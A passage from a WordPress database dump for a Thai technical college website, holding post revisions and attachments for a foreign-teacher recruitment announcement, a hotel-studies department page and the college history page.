(2629, 3, '2018-05-22 09:24:04', '2018-05-22 02:24:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'inherit', 'closed', 'closed', '', '2627-revision-v1', '', '', '2018-05-22 09:24:04', '2018-05-22 02:24:04', '', 2627, 'http://www.technicrayong.ac.th/2627-revision-v1/', 0, 'revision', '', 0),
(2635, 3, '2018-05-22 11:08:36', '2018-05-22 04:08:36', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'inherit', 'closed', 'closed', '', '2627-autosave-v1', '', '', '2018-05-22 11:08:36', '2018-05-22 04:08:36', '', 2627, 'http://www.technicrayong.ac.th/2627-autosave-v1/', 0, 'revision', '', 0),
(2637, 3, '2018-05-22 11:08:05', '2018-05-22 04:08:05', '', 'รับสมัครคัดเลือกครูต่างชาติedit', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%95%e0%b9%88%e0%b8%b2-2', '', '', '2018-05-22 11:08:05', '2018-05-22 04:08:05', '', 2627, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รับสมัครคัดเลือกครูต่างชาติedit.pdf', 0, 'attachment', 'application/pdf', 0),
(2638, 3, '2018-05-22 11:08:15', '2018-05-22 04:08:15', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'inherit', 'closed', 'closed', '', '2627-revision-v1', '', '', '2018-05-22 11:08:15', '2018-05-22 04:08:15', '', 2627, 'http://www.technicrayong.ac.th/2627-revision-v1/', 0, 'revision', '', 0),
(2639, 3, '2018-05-22 11:09:55', '2018-05-22 04:09:55', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4edit-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'inherit', 'closed', 'closed', '', '2623-autosave-v1', '', '', '2018-05-22 11:09:55', '2018-05-22 04:09:55', '', 2623, 'http://www.technicrayong.ac.th/2623-autosave-v1/', 0, 'revision', '', 0),
(2640, 3, '2018-05-22 11:09:24', '2018-05-22 04:09:24', '', 'รับสมัครคัดเลือกครูต่างชาติedit', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%95%e0%b9%88%e0%b8%b2-3', '', '', '2018-05-22 11:09:24', '2018-05-22 04:09:24', '', 2623, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/รับสมัครคัดเลือกครูต่างชาติedit-1.pdf', 0, 'attachment', 'application/pdf', 0),
(2641, 3, '2018-05-22 11:09:48', '2018-05-22 04:09:48', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F05%2F%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%95%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B2%E0%B8%95%E0%B8%B4edit-1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'Announcement for Personal Recruitment as a Temporary Employee (Foreign Teacher) For 2 Positions', '', 'inherit', 'closed', 'closed', '', '2623-revision-v1', '', '', '2018-05-22 11:09:48', '2018-05-22 04:09:48', '', 2623, 'http://www.technicrayong.ac.th/2623-revision-v1/', 0, 'revision', '', 0),
(2642, 3, '2018-05-22 15:19:24', '2018-05-22 08:19:24', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3324 size-full\" src=\"/wp-content/uploads/2018/07/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"680\" height=\"335\" />\r\n<h4><strong><a href=\"/wp-content/uploads/2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf\">แผนการจัดการเรียนรู้ วิชางานแม่บ้านโรงแรม</a></strong></h4>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf\">สื่อการเรียน วิชางานแม่บ้านโรงแรม รหัสวิชา 2701 2004</a></strong></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ทักษะชาตื.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ทักษะพื้นฐาน ระดับชาติ ครั้งที่ ๒๗</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม </a><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\"> ทักษะพื้นฐาน ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ </a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ระดับอาชีวศึกษาจังหวัดระยอง</a></span></h4>\r\n \r\n\r\nhttps://www.youtube.com/watch?v=zHBbaDHxzu4\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=txsLpn3jcpo\r\n\r\nhttps://www.youtube.com/watch?v=lMJQro3JQ3g\r\n\r\nhttps://youtu.be/CHzurSQGlZA\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&amp;feature=youtu.be\r\n\r\n \r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'publish', 'closed', 'closed', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%81%e0%b8%a3%e0%b8%a1', '', '', '2018-08-24 09:35:57', '2018-08-24 02:35:57', '', 0, 'http://www.technicrayong.ac.th/?page_id=2642', 0, 'page', '', 0),
(2643, 3, '2018-05-22 15:18:19', '2018-05-22 08:18:19', '', '22-5-2561 15-18-45', '', 'inherit', 'closed', 'closed', '', '22-5-2561-15-18-45', '', '', '2018-05-22 15:18:19', '2018-05-22 08:18:19', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg', 0, 'attachment', 'image/jpeg', 0),
(2644, 3, '2018-05-22 15:18:23', '2018-05-22 08:18:23', '', '22-5-2561 15-19-05', '', 'inherit', 'closed', 'closed', '', '22-5-2561-15-19-05', '', '', '2018-05-22 15:18:23', '2018-05-22 08:18:23', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/22-5-2561-15-19-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(2645, 3, '2018-05-22 15:18:24', '2018-05-22 08:18:24', '', '22-5-2561 15-19-23', '', 'inherit', 'closed', 'closed', '', '22-5-2561-15-19-23', '', '', '2018-05-22 15:18:24', '2018-05-22 08:18:24', '', 2642, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/05/22-5-2561-15-19-23.jpg', 0, 'attachment', 'image/jpeg', 0),
(2646, 3, '2018-05-22 15:19:24', '2018-05-22 08:19:24', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2645 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"477\" height=\"344\" />\r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-05-22 15:19:24', '2018-05-22 08:19:24', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(2648, 3, '2018-05-22 15:25:45', '2018-05-22 08:25:45', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2645 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"477\" height=\"344\" />\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-05-22 15:25:45', '2018-05-22 08:25:45', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(2649, 3, '2018-05-22 15:30:34', '2018-05-22 08:30:34', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-2645 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"477\" height=\"344\" />\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&feature=youtu.be\r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-05-22 15:30:34', '2018-05-22 08:30:34', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(2651, 3, '2018-05-22 15:45:06', '2018-05-22 08:45:06', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full alignleft\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full alignleft\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n<img class=\"size-full wp-image-2535 aligncenter\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-47-11.jpg\" alt=\"\" width=\"266\" height=\"53\" /><img class=\"aligncenter size-full wp-image-2537\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-54-14.jpg\" alt=\"\" width=\"181\" height=\"55\" />\r\n\r\n<img class=\"wp-image-2536 size-full alignleft\" src=\"/wp-content/uploads/2018/05/biodiversity-21597-1.jpg\" alt=\"\" width=\"800\" height=\"600\" />\r\n<h4></h4>\r\n<img class=\"aligncenter size-full wp-image-2538\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-56-09.jpg\" alt=\"\" width=\"204\" height=\"51\" /><img class=\"aligncenter wp-image-2539 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-17-58-52.jpg\" alt=\"\" width=\"136\" height=\"51\" />\r\n\r\n<img class=\"aligncenter wp-image-2542 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-18-03-44.jpg\" alt=\"\" width=\"442\" height=\"323\" /><img class=\"aligncenter wp-image-2543 size-full\" src=\"/wp-content/uploads/2018/05/17-5-2561-18-05-19.jpg\" alt=\"\" width=\"836\" height=\"326\" />\r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:45:06', '2018-05-22 08:45:06', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2652, 3, '2018-05-22 15:46:20', '2018-05-22 08:46:20', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full alignleft\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full alignleft\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n \r\n\r\n \r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:46:20', '2018-05-22 08:46:20', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2653, 3, '2018-05-22 15:48:17', '2018-05-22 08:48:17', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full alignleft\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full alignleft\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n \r\n\r\n \r\n<h4></h4>\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:48:17', '2018-05-22 08:48:17', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(2654, 3, '2018-05-22 15:50:08', '2018-05-22 08:50:08', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"wp-image-2464 size-full alignleft\" src=\"/wp-content/uploads/2018/05/1-1.jpg\" alt=\"\" width=\"837\" height=\"593\" /></h4>\r\n<img class=\"wp-image-2533 size-full alignleft\" src=\"/wp-content/uploads/2018/05/2.jpg\" alt=\"\" width=\"837\" height=\"590\" /><img class=\"wp-image-2534 size-full alignleft\" src=\"/wp-content/uploads/2018/05/3.jpg\" alt=\"\" width=\"837\" height=\"571\" />\r\n\r\n \r\n\r\n \r\n<h4></h4>\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"wp-image-1200 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"wp-image-1204 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"wp-image-1203 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"wp-image-1201 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"wp-image-1202 size-medium aligncenter\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-05-22 15:50:08', '2018-05-22 08:50:08', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
